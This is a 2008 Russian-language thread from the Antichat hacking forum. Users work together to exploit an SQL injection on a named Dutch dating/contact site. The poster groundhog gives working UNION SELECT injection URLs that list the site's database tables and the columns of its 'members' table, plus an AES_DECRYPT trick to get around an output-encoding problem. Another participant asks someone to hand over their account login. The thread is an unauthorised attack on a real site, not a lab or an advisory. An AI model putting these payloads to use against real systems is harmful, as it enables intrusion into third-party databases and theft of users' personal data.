Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
08.01.2008, 16:49
|
|
Познающий
Регистрация: 17.10.2006
Сообщений: 83
Провел на форуме:
552846
Репутация:
55
|
|
jjj
jjjjj
Последний раз редактировалось xena-mil1; 29.08.2008 в 22:32..
|
|
|
08.01.2008, 17:45
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
1.может лы быть такое что больше 400 полей в таблице?
может я чтото не так делаю?
Такого точно быть не может, но некоторые рукожопые программисты делают Join и до большего числа полей...
2.можно ли инджект без юниона использовать?
Ну теоретически можно завязаться на перебор с помощью Substr... Но оно тебе нужно? А вообще, Union на то и нужен чтобы в результирующую выборку добавить свой запрос и получить вывод необходимых тебе данных...
А насчёт инъекции - тут урла нужна... Фактически там может быть какой-нибудь хитрый фильтр, или нужно правильно закрыть условие запроса с помощью скобок... А возможно там ничего и не сделать... Например, вывод даёт второй запрос, а у тебя не проходит первый запрос и на этом работа паги завершается...
|
|
|
|
08.01.2008, 17:48
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062
Репутация:
1079
|
|
На mssql лучше использовать or, кроме того, там можно спользовать точку с запятой для разделения запросов. КОроче, читай статью [ cash ]
зы только сейчас понял, что там не mssql, извиняюсь, ступил.
Последний раз редактировалось Macro; 08.01.2008 в 18:05..
|
|
|
|
08.01.2008, 18:53
|
|
Познающий
Регистрация: 17.10.2006
Сообщений: 83
Провел на форуме:
552846
Репутация:
55
|
|
ddf
Последний раз редактировалось xena-mil1; 29.08.2008 в 22:33..
|
|
|
|
08.01.2008, 19:08
|
|
Постоянный
Регистрация: 10.12.2005
Сообщений: 939
Провел на форуме:
3886281
Репутация:
929
|
|
Ты там регался? Дай учетку.
|
|
|
|
08.01.2008, 19:10
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
Пока могу сказать что 99 полей...
Код:
http://www.contactwereld.nl/weergave.asp?ben=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,CAST(TABLE_NAME+AS+BINARY),36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99+FROM+INFORMATION_SCHEMA.TABLES/*
Только что-то с кодировкой...
Последний раз редактировалось groundhog; 08.01.2008 в 19:19..
|
|
|
|
08.01.2008, 19:24
|
|
Познающий
Регистрация: 01.02.2007
Сообщений: 89
Провел на форуме:
1668307
Репутация:
114
|
|
похоже багу закрыли... Редиректит на другую страницу  |
|
|
|
08.01.2008, 19:29
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
Ничего не закрыли. Проблемы с кодировкой решаются через AES_DECRYPT...
Вот все табы в базе:
http://www.contactwereld.nl/weergave.asp?ben=XXXXX'+UNION+SELECT+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,AES_DECRYPT(AES_ENCR YPT(TABLE_NAME,1),1),36,37,38,39,40,41,42,43,44,45 ,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,6 2,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78, 79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95 ,96,97,98,99+FROM+INFORMATION_SCHEMA.TABLES/*
Вот все поля таблицы 'members':
http://www.contactwereld.nl/weergave.asp?ben=XXXXX'+UNION+SELECT+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,AES_DECRYPT(AES_ENCR YPT(COLUMN_NAME,1),1),36,37,38,39,40,41,42,43,44,4 5,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61, 6 2,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78, 79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95 ,96,97,98,99+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE +TABLE_NAME='members'/*
В скандинавских языках я не силён, поэтому со значениями полей разбирайтесь сами... Благо в выводе присутствует большое число полей...
Последний раз редактировалось groundhog; 08.01.2008 в 19:40..
|
|
|
|
08.01.2008, 19:37
|
|
Познающий
Регистрация: 01.02.2007
Сообщений: 89
Провел на форуме:
1668307
Репутация:
114
|
|
хм, странно, при любом обращении к скрипту weergave.asp, меня редиректит на _http://www.contactwereld.nl/aanmelden.asp
в чем может быть проблема?
Последний раз редактировалось [aywo]; 08.01.2008 в 19:40..
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [aywo]](/avatars/avatar32504.jpg?553477){kind=avatar}
![Аватар для [aywo]](/avatars/avatar32504.jpg?553505){kind=avatar}
Линейный вид
